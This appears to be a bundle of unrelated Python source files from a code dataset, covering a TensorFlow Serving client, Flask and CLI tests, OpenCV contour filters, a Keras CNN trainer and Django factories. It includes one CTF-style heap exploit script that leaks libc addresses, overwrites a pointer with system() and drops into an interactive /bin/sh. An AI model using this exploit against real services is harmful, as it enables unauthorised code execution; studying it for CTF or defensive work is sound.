# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#!/usr/bin/env python2.7
"""A client that talks to tensorflow_model_server.
Typical usage example:
xgboost_client.py --num_tests=100 --server=localhost:9000
"""
from __future__ import print_function
import sys
import time
import grpc
import numpy
import random
from grpc._cython.cygrpc import CompressionAlgorithm
from grpc._cython.cygrpc import CompressionLevel
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2
from tensorflow_serving.apis import prediction_service_pb2_grpc
from google.protobuf import text_format
import tensorflow as tf
# Command-line flags: number of Predict calls to issue and the target server.
tf.compat.v1.app.flags.DEFINE_integer('num_tests', 1, 'Number of tests')
tf.compat.v1.app.flags.DEFINE_string('server', '', 'PredictionService host:port')
FLAGS = tf.compat.v1.app.flags.FLAGS
def do_inference(hostport, num_tests):
    """Tests PredictionService with requests.

    Args:
      hostport: Host:port address of the PredictionService.
      num_tests: Number of test requests to send.

    Returns:
      void.
    """
    options = [
        ("grpc.default_compression_algorithm", CompressionAlgorithm.gzip),
        # BUG FIX: the key was misspelled "grpc.grpc.default_compression_level",
        # which gRPC silently ignores, so no compression level was ever applied.
        ("grpc.default_compression_level", CompressionLevel.high)
    ]
    channel = grpc.insecure_channel(hostport, options)
    stub = prediction_service_pb2_grpc.PredictionServiceStub(channel)
    for _ in range(num_tests):
        request = predict_pb2.PredictRequest()
        request.model_spec.name = 'test'
        # request.model_spec.version.value = 1
        xgboost_feature_score_1 = predict_pb2.FeatureScore(
            id=[2, 34, 2000, 2206],
            score=[1, 1, 0.646667, 0.727273],
        )
        xgboost_features = [xgboost_feature_score_1 for i in range(0, 1)]
        xgboost_feature_vector = predict_pb2.FeatureScoreVector(feature_score=xgboost_features)
        request.inputs['xgboost_features'].CopyFrom(xgboost_feature_vector)
        # 30.0 is the per-call timeout in seconds.
        response = stub.Predict(request, 30.0)
        print(response)
def main(_):
    # Entry point invoked by tf.app.run(): validate flags, then run the client.
    if FLAGS.num_tests > 10000:
        print('num_tests should not be greater than 10k')
        return
    if not FLAGS.server:
        print('please specify server host:port')
        return
    do_inference(FLAGS.server, FLAGS.num_tests)
if __name__ == '__main__':
    # tf.app.run() parses the flags and then calls main(_).
    tf.compat.v1.app.run()
|
StarcoderdataPython
|
6416308
|
<reponame>iandtek/realtor-deals-analyzer<filename>app.py
from flask import Flask
import json
# Flask application instance serving the /properties endpoint below.
app = Flask(__name__)
@app.route("/properties")
def properties():
    """Serve the property list, re-read from properties.json on each request.

    :return: dict (Flask converts it to a JSON response).
    """
    # Use a context manager so the file handle is closed promptly; the
    # original json.load(open(...)) left the handle to be closed by GC.
    with open('properties.json') as f:
        return {'properties': json.load(f)}
if __name__ == "__main__":
    # Development server only; use a production WSGI server for deployment.
    app.run()
|
StarcoderdataPython
|
4801259
|
<filename>tests/test_cookie.py
#!/usr/bin/python3
"""
Testing the supposedly beautiful command line parsing
@author chairs
"""
import unittest
from cookie.cookie import Cookie
# Shared Cookie app under test; the notes tuple is asserted in test_notes.
app = Cookie(__name__, notes=('simple', 'test'))
class TestCookie(unittest.TestCase):
    """Exercises the Cookie CLI helper: notes metadata and the args decorator."""

    def test_notes(self):
        """The notes tuple passed at construction is exposed unchanged."""
        self.assertEqual(('simple', 'test'), app.notes)

    def test_decorator(self):
        """A get_args-wrapped function run through app.run produces usage text."""
        @app.get_args
        def greeter(name=str()):
            return 'Hello %s!' % name

        app.run(greeter)
        assert 'Usage: ' in app.outline
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
|
StarcoderdataPython
|
9666464
|
<filename>ovl/target_filters/contour_filters.py
from typing import Tuple
import math
import cv2
from ..math.contours import contour_center
from ..math.geometry import distance_between_points
from ..math.image import distance_from_frame
from .contour_filter import contour_filter
from ..utils.types import RangedNumber
from ..utils.constants import DEFAULT_IMAGE_HEIGHT, DEFAULT_IMAGE_WIDTH
from ..math import image
@contour_filter
def image_center_filter(contour_list, image_dimensions: Tuple[int, int] = (DEFAULT_IMAGE_WIDTH, DEFAULT_IMAGE_HEIGHT),
                        min_ratio: RangedNumber(0, 1) = 0.7, max_ratio: RangedNumber(0, 1) = math.inf):
    """
    Keeps only contours whose center is close enough to the image center.

    :param contour_list: a list of contours to be filtered
    :param image_dimensions: the size of the image (width, height)
    :param min_ratio: minimum ratio of center distance to frame distance
    :param max_ratio: maximum ratio of center distance to frame distance
    :return: (kept contours, their distance ratios)
    """
    kept, ratios = [], []
    center_point = image.image_center(image_dimensions)
    for current_contour in contour_list:
        center = contour_center(current_contour)
        center_distance = distance_between_points(center, center_point)
        frame_distance = distance_from_frame(center, image_dimensions)
        ratio_value = center_distance / frame_distance
        if min_ratio <= ratio_value <= max_ratio:
            kept.append(current_contour)
            ratios.append(ratio_value)
    return kept, ratios
@contour_filter
def distance_filter(contour_list, point: Tuple[int, int], min_dist: float = 0, max_dist: float = 50):
    """
    Keeps only contours whose center lies within [min_dist, max_dist] pixels
    of the given (x, y) point.

    :param contour_list: a list of contours to be filtered
    :param point: reference point, a tuple (or list) of 2 numbers
    :param min_dist: minimum distance from the point in pixels
    :param max_dist: maximum distance from the point in pixels
    :return: (kept contours, their distances)
    """
    kept, distances = [], []
    for current_contour in contour_list:
        separation = distance_between_points(contour_center(current_contour), point)
        if min_dist <= separation <= max_dist:
            kept.append(current_contour)
            distances.append(separation)
    return kept, distances
@contour_filter
def absolute_distance_filter(contour_list, max_dist=50, min_dist=0,
                             image_dimensions=(DEFAULT_IMAGE_WIDTH, DEFAULT_IMAGE_HEIGHT)):
    """
    Keeps only contours whose center lies within [min_dist, max_dist] pixels
    of the image center.

    :param contour_list: a list of contours to be filtered
    :param image_dimensions: the size of the image (width, height)
    :param max_dist: maximum distance from the center in pixels
    :param min_dist: minimum distance from the center in pixels
    :return: (kept contours, their distances)
    """
    kept, distances = [], []
    width, height = image_dimensions
    # Pixel-center convention: subtract half a pixel from the midpoint.
    center_point = (width / 2 - .5, height / 2 - .5)
    for current_contour in contour_list:
        separation = distance_between_points(contour_center(current_contour), center_point)
        if min_dist <= separation <= max_dist:
            kept.append(current_contour)
            distances.append(separation)
    return kept, distances
@contour_filter
def length_filter(contour_list, min_length=50, max_length=76800):
    """
    Receives a list of contours and removes ones that are not long enough
    Note: for "open" contours only!
    :param contour_list: list of contours (numpy array) to be filtered
    :param min_length: minimum length of a contour (in pixels)
    :param max_length: maximum length of a contour (in pixels)
    :return: list of filtered contours and list of the lengths
    """
    output = []
    ratio = []
    for contour in contour_list:
        perimeter = cv2.arcLength(contour, False)
        # BUG FIX: the original condition was
        # `min_length >= perimeter >= max_length`, which can never hold when
        # min_length < max_length, so every contour was discarded. Keep
        # contours whose arc length falls inside the range instead.
        if min_length <= perimeter <= max_length:
            output.append(contour)
            ratio.append(perimeter)
    return output, ratio
@contour_filter
def area_filter(contour_list, min_area: float = 200, max_area: float = math.inf):
    """
    Keeps only contours whose area (in pixels) is inside [min_area, max_area].

    :param max_area: maximum area of a contour (inclusive), default no limit
    :param min_area: minimum area of a contour (inclusive), 0 for no lower limit
    :param contour_list: list of contours to filter
    :return: (kept contours, their areas)
    """
    kept, areas = [], []
    for current_contour in contour_list:
        current_area = cv2.contourArea(current_contour)
        if min_area <= current_area <= max_area:
            kept.append(current_contour)
            areas.append(current_area)
    return kept, areas
@contour_filter
def percent_area_filter(contour_list, minimal_percent: RangedNumber(0, 1) = 0.02,
                        maximum_percent: RangedNumber(0, 1) = 1,
                        image_dimensions: Tuple[int, int] = (DEFAULT_IMAGE_WIDTH, DEFAULT_IMAGE_HEIGHT)):
    """
    Keeps only contours whose area is within the given fraction range of the
    whole image area (1% -> 0.01).

    :param contour_list: list of contours to be filtered (numpy.ndarray)
    :param minimal_percent: minimal ratio between contour area and image area
    :param maximum_percent: maximum ratio between contour area and image area
    :param image_dimensions: the (width, height) of the image in pixels
    :return: (kept contours, their area fractions)
    """
    kept, percents = [], []
    total_pixels = image_dimensions[0] * image_dimensions[1]
    if total_pixels == 0:
        raise ValueError("Invalid image dimensions, Received (width, height): {}, {}".format(*image_dimensions))
    for current_contour in contour_list:
        percent_of_image = cv2.contourArea(current_contour) / total_pixels
        if minimal_percent <= percent_of_image <= maximum_percent:
            kept.append(current_contour)
            percents.append(percent_of_image)
    return kept, percents
@contour_filter
def size_ratio_filter(contours, min_ratio: float = 2, max_ratio: float = math.inf, reverse_ratio=False):
    """
    Keeps only contours whose bounding-box width/height ratio is in range.

    :param contours: the contours to be filtered
    :param min_ratio: the minimum ratio
    :param max_ratio: the maximum ratio
    :param reverse_ratio: if True, use height/width instead of width/height
    :return: (kept contours, their ratios)
    """
    kept, ratios = [], []
    for current_contour in contours:
        _, _, width, height = cv2.boundingRect(current_contour)
        if width == 0 or height == 0:
            raise ValueError(
                "The width or height of one of the contours was 0,\n"
                " try using an area filter before this filter")
        ratio_value = height / width if reverse_ratio else width / height
        if min_ratio <= ratio_value <= max_ratio:
            kept.append(current_contour)
            ratios.append(ratio_value)
    return kept, ratios
|
StarcoderdataPython
|
4859608
|
import socket
import telnetlib
import struct
from hexdump import hexdump
def q(a):
    """Pack integer *a* as native-endian 32-bit unsigned bytes ("I" format)."""
    return struct.Struct("I").pack(a)
def interact():
    # Hand the exploited connection over to an interactive telnet session so
    # the user can drive the spawned shell manually.
    # NOTE(review): relies on the module-level socket `s`.
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()
def r_until(st):
    # Keep receiving from the module-level socket `s` until the marker string
    # appears in the accumulated data, then return everything read so far.
    # NOTE(review): Python 2 code — under Python 3, recv() returns bytes and
    # this str concatenation would raise TypeError.
    ret = ""
    while st not in ret:
        ret += s.recv(8192)
    return ret
# CTF exploit driver (Python 2): stage 1 corrupts a heap chunk to leak a
# libc pointer; stage 2 overwrites a function pointer with system("/bin/sh").
s = socket.create_connection(("localhost", 2323))
print r_until("option")
# Groom the heap via menu option 1 (three 16-byte allocations).
s.send("1\n16\n1\n16\n1\n16\n")
print r_until("option")
# 0x61616165 <-- 0x51515151
#dat = "a"*0x18+q(0x25)+q(0x51515151)+q(0x61616161)
# 0x804a06C <-- 0x804A004
dat = "/bin/sh\x00"+"a"*0x10+q(0x25)+q(0x804A004)+q(0x804a06C-4)
s.send("3\n0\n100\n")
print r_until("your data.")
s.send(dat)
print r_until("option")
s.send("2\n1\n")
print r_until("option")
s.send("4\n3\n")
dat = r_until("option")
# Leak the fflush GOT entry and derive libc/system addresses.
# NOTE(review): the 0x657a0 / 0x3f430 offsets are specific to the target's
# libc build.
fflush = struct.unpack("I", dat.split("id.\n")[1][0:4])[0]
libc_base = fflush - 0x657a0
system = libc_base + 0x3f430
print hex(libc_base)
# phase 2, change puts to be system
s.send("3\n3\n100\n")
print r_until("your data.")
s.send(q(fflush)+q(system))
# puts is broken here
s.send("4\n0\n")
print "** interact **"
interact()
|
StarcoderdataPython
|
238249
|
import unittest
from hamcrest import assert_that, equal_to
from lxslt import MatchName, DeepDive
class DeepDiveTest(unittest.TestCase):
    """Tests for DeepDive: project the deepest nodes matching a predicate.

    Trees are plain nested lists whose first element is the node name.
    """

    @classmethod
    def setUpClass(cls):
        # One shared diver that matches nodes named 'child'.
        cls.diver = DeepDive(MatchName('child'))

    def test_find_on_first_level(self):
        tree = ['root', ['child']]
        back = self.diver.project(tree)
        assert_that(list(back), equal_to([['child']]))

    def test_find_on_second_level(self):
        # A matching descendant wins over its matching ancestor.
        tree = ['root', ['child', ['child', 'level2']]]
        back = self.diver.project(tree)
        assert_that(list(back), equal_to([['child', 'level2']]))

    def test_find_several_on_deep_level(self):
        # Multiple deepest matches are all returned, in document order.
        tree = ['root', ['child',
                         ['child', ['level2'],
                          ['child', ['level3']],
                          ['child', ['child', 'levelN']]]]]
        back = self.diver.project(tree)
        assert_that(list(back), equal_to(
            [['child', ['level3']], ['child', 'levelN']]))

    def test_stop_dive_on_mismatch(self):
        # A non-matching node stops the descent; the matching ancestor is
        # returned whole.
        tree = ['root', ['child', ['stop-dive', ['child', 'nested']]]]
        back = self.diver.project(tree)
        assert_that(list(back), equal_to(
            [['child', ['stop-dive', ['child', 'nested']]]]))

    def test_dive_on_headless_nodes(self):
        # Wrapper lists without a name head are transparent to the dive.
        tree = [[['child', [[['child', ['child', ['x', 'aaa']]]]]]]]
        back = self.diver.project(tree)
        assert_that(list(back), equal_to(
            [['child', ['x', 'aaa']]]))
if '__main__' == __name__:
    # Allow running this test module directly.
    unittest.main()
|
StarcoderdataPython
|
6494235
|
<gh_stars>0
from threading import Thread
from . import test_cipher
from . import test_digest
class ThreadedTester(Thread):
    """Worker thread running the digest and cipher self-tests once.

    `failed` (and `exception`, when set) record the outcome so the spawning
    code can assert on it after join().
    """
    failed = False

    def run(self):
        try:
            test_digest.test_digest()
            test_cipher.test_cipher(['a' * 1000, 'd' * 1000])
            # test_evp.test_rand()
        except Exception as error:
            self.failed = True
            self.exception = error
def test_threaded_crypto():
    """Run the crypto self-tests on 10 concurrent threads and fail if any errored."""
    threads = [ThreadedTester() for _ in range(10)]
    # BUG FIX: the original used map(lambda t: t.start(), threads) /
    # map(..., t.join(), ...). In Python 3 map() is lazy, so the threads were
    # never actually started or joined. Iterate explicitly instead.
    for t in threads:
        t.start()
    # wait for the threads to complete
    for t in threads:
        t.join()
    assert all(not t.failed for t in threads), "Some threads failed"
if __name__ == '__main__':
    # Allow running the threaded smoke test directly.
    test_threaded_crypto()
|
StarcoderdataPython
|
1890866
|
<gh_stars>1-10
# Initial loot arrives as one '|'-separated line; commands follow one per line.
loot = input().split("|")
cmd = input()
class Treasure:
    """Pirate loot container supporting loot/drop/steal commands.

    repr() reports the average item-name length as "treasure gain".
    """

    def __init__(self, loot):
        self.loot = loot

    def loot_items(self, found_treasure):
        """Prepend every found item that is not already held."""
        for piece in found_treasure:
            if piece in self.loot:
                continue
            self.loot.insert(0, piece)

    def drop(self, idx):
        """Move the item at idx to the end; out-of-range indices are ignored."""
        if 0 <= idx < len(self.loot):
            self.loot.append(self.loot.pop(idx))

    def steal(self, count):
        """Remove up to count items from the end and print them in original order."""
        count = min(count, len(self.loot))
        taken = [self.loot.pop() for _ in range(count)]
        print(', '.join(reversed(taken)))

    def __repr__(self):
        if not self.loot:
            return 'Failed treasure hunt.'
        average_gain = sum(len(item) for item in self.loot) / len(self.loot)
        return f'Average treasure gain: {average_gain:.2f} pirate credits.'
treasure = Treasure(loot)
# Process commands until the "Yohoho!" terminator; the first token selects
# the action and the remaining tokens are its arguments.
while not cmd == "Yohoho!":
    command = cmd.split()[0]
    if command == "Loot":
        items = cmd.split()[1:]
        treasure.loot_items(items)
    elif command == "Drop":
        loot_index = int(cmd.split()[1])
        treasure.drop(loot_index)
    elif command == "Steal":
        items_count = int(cmd.split()[1])
        treasure.steal(items_count)
    cmd = input()
print(treasure)
|
StarcoderdataPython
|
263044
|
<reponame>fabiangunzinger/python_pottering
import turtle
def koch(t, n):
    """Draw a Koch curve of length n with the turtle-like object t.

    Segments shorter than 25 are drawn straight; otherwise the curve is four
    third-length Koch curves joined by left 60°, right 120°, left 60° turns.
    """
    if n < 25:
        t.fd(n)
        return
    segment = n / 3
    koch(t, segment)
    for turn_method, angle in (('lt', 60), ('rt', 120), ('lt', 60)):
        getattr(t, turn_method)(angle)
        koch(t, segment)
def snowflake(t, n):
    """Draw a Koch snowflake: three Koch curves joined by 120° right turns.

    NOTE: defined but not used by the demo code at the bottom of this file.
    """
    for _ in range(3):
        koch(t, n)
        t.rt(120)
# Demo: draw one Koch curve of length 300 starting at the upper left.
bob = turtle.Turtle()
# Pen up while repositioning, pen down to draw.
bob.pu()
bob.goto(-150, 90)
bob.pd()
koch(bob, 300)
# Keep the window open until the user closes it.
turtle.mainloop()
|
StarcoderdataPython
|
5125951
|
import re
from distutils.command.build import build
from setuptools import setup
from setuptools.command.install import install as _install
# Extract __version__ from aws_ir/_version.py without importing the package
# (importing could trigger package side effects during installation).
# Use a context manager so the file handle is closed deterministically; the
# original open(...).read() left it to be closed by GC.
with open('aws_ir/_version.py', 'r') as _version_file:
    VERSION = re.search(
        r"^__version__ = ['\"]([^'\"]*)['\"]",
        _version_file.read(),
        re.MULTILINE
    ).group(1)
class install(_install):
    """setuptools install command that always runs the build step first."""
    def run(self):
        # Ensure 'build' (and anything hooked onto it) runs before the
        # default install logic.
        self.run_command('build')
        _install.run(self)
# Package metadata and dependencies for the aws_ir distribution.
setup(name="aws_ir",
      version=VERSION,
      author="<NAME>, <NAME>, <NAME>, <NAME>",
      author_email="<EMAIL>,<EMAIL>,<EMAIL>",
      packages=["aws_ir", "aws_ir/libs", "aws_ir/plans"],
      license="MIT",
      description="AWS Incident Response ToolKit",
      scripts=['bin/aws_ir'],
      url='https://github.com/ThreatResponse/aws_ir',
      download_url="https://github.com/ThreatResponse/aws_ir/archive/v0.3.0.tar.gz",
      # NOTE(review): use_2to3 was removed in setuptools 58 — installation
      # with a modern setuptools will fail until this flag is dropped.
      use_2to3=True,
      install_requires=['boto3>=1.3.0',
                        'progressbar_latest',
                        'logutils==0.3.3',
                        'requests',
                        'structlog',
                        'pytz',
                        'jinja2',
                        'pluginbase',
                        'margaritashotgun>=0.4.1',
                        'aws-ir-plugins>=0.0.2'
                        ],
      tests_require=['pytest',
                     'pytest-cov',
                     'moto',
                     'mock',
                     'magicmock'],
      )
|
StarcoderdataPython
|
1991086
|
from ..contrib.auth.signals import *
|
StarcoderdataPython
|
6429499
|
# This problem was asked by Google.
# Given an array of integers, return a new array where each element in the new array
# is the number of smaller elements to the right of that element in the original input array.
# For example, given the array [3, 4, 9, 6, 1], return [1, 1, 2, 1, 0], since:
# • There is 1 smaller element to the right of 3
# • There is 1 smaller element to the right of 4
# • There are 2 smaller elements to the right of 9
# • There is 1 smaller element to the right of 6
# • There are no smaller elements to the right of 1
####
class Node:
    """BST node augmented with subtree-size bookkeeping.

    insert() returns the number of previously inserted values that are
    strictly smaller than the inserted value.

    BUG FIX: the original counted only the number of right turns taken on
    the insertion path, which undercounts (e.g. inserting 2, 1, 5 reported
    1 smaller value for 5 instead of 2). Tracking the size of each node's
    left subtree plus its duplicate count gives the exact answer.
    """

    def __init__(self):
        self.left = None
        self.right = None
        self.val = None        # None marks an empty (sentinel) node
        self.left_size = 0     # number of values stored in the left subtree
        self.dup_count = 0     # how many times self.val has been inserted

    def insert(self, val, ctr=0):
        """Insert val; return how many previously inserted values are < val."""
        if self.val is None:
            self.val = val
            self.dup_count = 1
            return ctr
        if val < self.val:
            # val goes left; it does not pass any smaller values.
            self.left_size += 1
            if not self.left:
                self.left = Node()
            return self.left.insert(val, ctr)
        if val == self.val:
            # Equal values are not "smaller"; only the left subtree counts.
            self.dup_count += 1
            return ctr + self.left_size
        # val > self.val: every value at or left of this node is smaller.
        if not self.right:
            self.right = Node()
        return self.right.insert(val, ctr + self.left_size + self.dup_count)
def numbers_less_than(arr):
    """Return, for each element, the count of smaller elements to its right.

    BUG FIX: the original BST approach counted only right turns on the
    insertion path, which undercounts (e.g. [5, 1, 2] returned [1, 0, 0]
    instead of [2, 0, 0]). This version scans from the right, keeping a
    sorted list of the elements seen so far; bisect_left gives the exact
    number of strictly smaller elements in O(log n) per lookup.

    :param arr: list of comparable values (may be empty).
    :return: list of counts, same length as arr.
    """
    from bisect import bisect_left, insort
    seen = []
    counts = []
    for value in reversed(arr):
        counts.append(bisect_left(seen, value))
        insort(seen, value)
    counts.reverse()
    return counts
####
# Expected output: [1, 1, 2, 1, 0]
print(numbers_less_than([3, 4, 9, 6, 1]))
|
StarcoderdataPython
|
5087795
|
import numpy as np
import pandas as pds
from keras.models import Sequential
from keras.layers import Input, Dense, Dropout, BatchNormalization
from keras.wrappers.scikit_learn import KerasRegressor
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import KFold
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
from sklearn.metrics import mean_squared_error
from keras.callbacks import EarlyStopping
from keras.layers.convolutional import Conv1D
from keras.layers.pooling import MaxPooling1D
from keras.optimizers import Adam
import keras
from keras.layers.core import Dense, Activation, Dropout, Flatten
from keras.utils import plot_model
from keras.callbacks import TensorBoard
from keras.datasets import cifar10
from keras.utils import np_utils
import sys
import threading
import os
import pandas as pd
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix, accuracy_score, f1_score
import itertools
from sklearn import model_selection
from keras.optimizers import Adam
import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Dropout
from keras.optimizers import RMSprop
from sklearn.model_selection import StratifiedKFold
import seaborn as sns
from keras import backend as K
import tensorflow as tf
sns.set(style="whitegrid", color_codes=True)
#######################################
#
# please insert code here to prepare input data(x) and supervised data(y)
# or please run the program "3 Dimensional Data.py" first to fill in x and y
# NEED TO BE CHANGE
subject = ["Edo1", "Edo2", "Hyo", "Kei", "Michael", "Ren", "Seiji", "Takuya"]
num_of_subject = 8
num_of_data = 150 # number of data for each cut data excel file
movement = ["gentlestroke", "notouch", "poke", "press", "scratch"]
num_of_movement = 5 # number of movement types
total_file = [30, 5, 30, 30, 30] # number of excel files for each corresponding movement
# STATIC VAR
main_directory = "D:/TUAT/GV Lab Research Internship/Machine Learning/Data/Normalized_Cut_Data/Sensor1/" #dont forget to change the sensor's name!!!
# DYNAMIC VAR
coordinate = 0 # 0 for X, 1 for Y, 2 for Z
i = 0 # counting number of data in each file
counter = 0 # counting total file for EACH movement types
move = 0 # counting number of movement types
file = 0 # counting number of total file
# calculating total number of file
N = 0
for j in range(0, num_of_movement):
    N = N + total_file[j]*num_of_subject
#3 dimensional matrix to be filled up
x = np.zeros((N, num_of_data, 3)) #(z,y,x)
#matrix to be filled up
y = np.zeros((N, 1))
# Iteration to fill up the 3 dimensional matrix input & the supervised data
# Nesting: subject > movement > file > coordinate > sample; the counters are
# reset by hand at the end of each level.
for people in range (0, num_of_subject): #subject change
    directory = main_directory + subject[people] + "/" + str(num_of_data)
    while move < num_of_movement: # movement change
        while counter < total_file[move]: # file change
            # The class label is the movement index.
            y[file, 0] = move
            file_read = pd.read_excel(
                directory + "/" + movement[move] + "n_" + str(num_of_data) + "_" + str(counter) + ".xlsx", "Sheet")
            while coordinate < 3: # coordinate change
                for i in range(0, (num_of_data)): # data change
                    x[file, i, coordinate] = file_read[coordinate][i]
                coordinate += 1
                i = 0
            counter += 1
            file += 1
            coordinate = 0
        move += 1
        counter = 0
    move = 0
print (x)
print (y)
print ("3 Dimensional Data-------end")
#######################################
#YOU CAN CHANGE THIS PART
#test_size = percentage of the data that will be used for testing the model
(X_train, X_test, y_train, y_test) = train_test_split(x, y, test_size=0.3)
print('split out')
nb_classes = 5 #CHANGE NUMBER OF CLASSES HERE
fold_num = 5
Y_train = np_utils.to_categorical(y_train, nb_classes)
Y_test = np_utils.to_categorical(y_test, nb_classes)
# Y_train = np.reshape(np.array(y_train),(420))
# Y_test = np.reshape(np.array(y_test),(1,180))
# Flatten each (150, 3) sample to 450 values, then add a channel axis for Conv1D.
train_X = np.reshape(np.array(X_train), (X_train.shape[0], 450))
train_X = np.reshape(np.array(train_X), (X_train.shape[0], 450, 1))
test_X = np.reshape(np.array(X_test), (X_test.shape[0], 450))
test_X = np.reshape(np.array(test_X), (X_test.shape[0], 450, 1))
# input_x = K.placeholder(shape=(None, train_X.shape[1], train_X.shape[2]), name='X')
# input_y = K.placeholder(shape=(None, nb_classes), name='Y')
print('ready')
def plot_confusion_matrix(cm, classes,
                          normalize=False,
                          title='Confusion matrix',
                          cmap=plt.cm.Blues):
    """Render the confusion matrix *cm* with matplotlib and echo it to stdout.

    When *normalize* is true, each row is scaled to sum to 1 before display.
    Axis tick labels are taken from *classes*.
    """
    if normalize:
        row_totals = cm.sum(axis=1)[:, np.newaxis]
        cm = cm.astype('float') / row_totals
        print("Normalized confusion matrix")
    else:
        print('Confusion matrix, without normalization')
    print(cm)
    plt.imshow(cm, interpolation='nearest', cmap=cmap)
    plt.title(title)
    plt.colorbar()
    ticks = np.arange(len(classes))
    plt.xticks(ticks, classes, rotation=45)
    plt.yticks(ticks, classes)
    cell_fmt = '.2f' if normalize else 'd'
    midpoint = cm.max() / 2.
    # annotate every cell, flipping the text colour on the dark half
    for row in range(cm.shape[0]):
        for col in range(cm.shape[1]):
            plt.text(col, row, format(cm[row, col], cell_fmt),
                     horizontalalignment="center",
                     color="white" if cm[row, col] > midpoint else "black")
    plt.tight_layout()
    plt.ylabel('True label')
    plt.xlabel('Predicted label')
# → UPPER (edited)
# Model definition: VGG-style 1-D CNN over the flattened 450-sample signals,
# ending in a 5-way softmax classifier.
model = Sequential()
model.add(Conv1D(64, 3, padding='same', input_shape=(450, 1)))
model.add(Activation('relu'))
model.add(Conv1D(64, 3, padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling1D(2, padding='same'))
model.add(Conv1D(128, 3, padding='same'))
model.add(Activation('relu'))
model.add(Conv1D(128, 3, padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling1D(2, padding='same'))
model.add(Conv1D(256, 3, padding='same'))
model.add(Activation('relu'))
model.add(Conv1D(256, 3, padding='same'))
model.add(Activation('relu'))
model.add(Conv1D(256, 3, padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling1D(2, padding='same'))
model.add(Conv1D(512, 3, padding='same'))
model.add(Activation('relu'))
model.add(Conv1D(512, 3, padding='same'))
model.add(Activation('relu'))
model.add(Conv1D(512, 3, padding='same'))
model.add(Activation('relu'))
model.add(Flatten())
model.add(Dense(4096))
model.add(Dense(4096))
model.add(Dropout(0.5))
model.add(Dense(5)) #CHANGE HERE TO CHANGE THE NUMBER OF CLASSES
model.add(Activation('softmax'))
adam = Adam(lr=1e-4)
model.compile(optimizer=adam, loss='categorical_crossentropy', metrics=["accuracy"])
model.summary()
epochs = 100
#YOU CAN CHANGE THIS PART
#this is for the early stops when the loss start to increase instead of decreasing
#early_stopping = EarlyStopping(patience=2,atience=5, verbose=1, mode verbose=1)
# es_cb = EarlyStopping(monitor='val_loss', p='auto')
#bacth_size = changing the number of file will be used before updating the weights and bias in 1 epoch
#validation_split = the percentage of the data that will be used for the validation during the training
history = model.fit(x=train_X, y=Y_train, batch_size=10, validation_split=0.3, epochs=epochs)
# plot training vs validation loss curves
plt.plot(range(len(history.history['loss'])), history.history['loss'], label='loss')
plt.plot(range(len(history.history['val_loss'])), history.history['val_loss'], label='val_loss')
plt.xlabel('epoch')
plt.ylabel('loss')
plt.legend()
plt.show()
#YOU CAN CHANGE THIS PART
#this is the file name to save the CNN Model (cnn_model.json) and the weights (cnn_model_weights.hdf5)
json_string = model.to_json()
open(os.path.join('./', 'cnn_model.json'), 'w').write(json_string)
model.save_weights(os.path.join('./', 'cnn_model_weight.hdf5'))
score = model.evaluate(test_X, Y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
pred_y = model.predict(test_X)
pred_Y = np.argmax(pred_y, axis=1)
pred_Y = pred_Y[:, np.newaxis] # column vector
confusion_matrix(y_test, pred_Y)
print(f1_score(y_test, pred_Y, average='macro'))
# Compute confusion matrix
cnf_matrix = confusion_matrix(y_test, pred_Y)
np.set_printoptions(precision=2)
# Plot non-normalized confusion matrix
# NOTE(review): only 4 (empty) labels here but nb_classes == 5 -- the fifth
# class gets no tick label; confirm the intended class names.
class_names = ["", "", "", ""]
plt.figure()
plot_confusion_matrix(cnf_matrix, classes=class_names,
                      title='Confusion matrix, without normalization')
# Plot normalized confusion matrix
plt.figure()
plot_confusion_matrix(cnf_matrix, classes=class_names, normalize=True,
                      title='Normalized confusion matrix')
plt.show()
# →LOWER (edited)
|
StarcoderdataPython
|
6456185
|
<reponame>tejpratap545/E-Commerce-Application
from backend.users.models import User
from factory import post_generation
from factory.django import DjangoModelFactory
from faker import Faker
from oauth2_provider.models import Application
from typing import Any, Sequence
import factory
fake = Faker()
class UserFactory(DjangoModelFactory):
    """Factory producing regular ``User`` instances with realistic fake data."""

    class Meta:
        model = User
        django_get_or_create = ["email"]

    # BUG FIX: the original called fake.email() etc. at class-definition time,
    # so every user produced by the factory shared the exact same values --
    # and with django_get_or_create on the static email, only one user could
    # ever be created.  factory.Faker defers evaluation to build time, giving
    # each instance fresh data.
    contact_number = factory.Faker("phone_number")
    email = factory.Faker("email")
    first_name = factory.Faker("first_name")
    last_name = factory.Faker("last_name")
    date_of_birth = factory.Faker("date_of_birth")

    @post_generation
    def password(self, create: bool, extracted: Sequence[Any], **kwargs):
        # Hash and store a placeholder password after the instance is built.
        password = "<PASSWORD>"
        self.set_password(password)
class AdminUserFactory(UserFactory):
    # Same as UserFactory but flags the created user as an admin.
    is_admin = True
class SuperUserFactory(DjangoModelFactory):
    """Factory producing Django superusers with realistic fake data."""

    class Meta:
        model = User
        django_get_or_create = ["email"]

    # BUG FIX: as in UserFactory, the fake.*() calls ran once at import time,
    # so every superuser shared one email/name/etc.; factory.Faker evaluates
    # per instance instead.
    contact_number = factory.Faker("phone_number")
    email = factory.Faker("email")
    first_name = factory.Faker("first_name")
    last_name = factory.Faker("last_name")
    date_of_birth = factory.Faker("date_of_birth")
    is_superuser = True

    @post_generation
    def password(self, create: bool, extracted: Sequence[Any], **kwargs):
        # Hash and store a placeholder password after the instance is built.
        password = "<PASSWORD>"
        self.set_password(password)
class SellerUserFactory(UserFactory):
    # Same as UserFactory but flags the created user as a seller.
    is_seller = True
class ApplicationFactory(DjangoModelFactory):
    """Factory for OAuth2 ``Application`` records using the password grant."""

    class Meta:
        model = Application
        django_get_or_create = ["name"]

    # BUG FIX: fake.name() evaluated once at import time made every
    # application share one name (collapsed by django_get_or_create);
    # factory.Faker defers to build time.
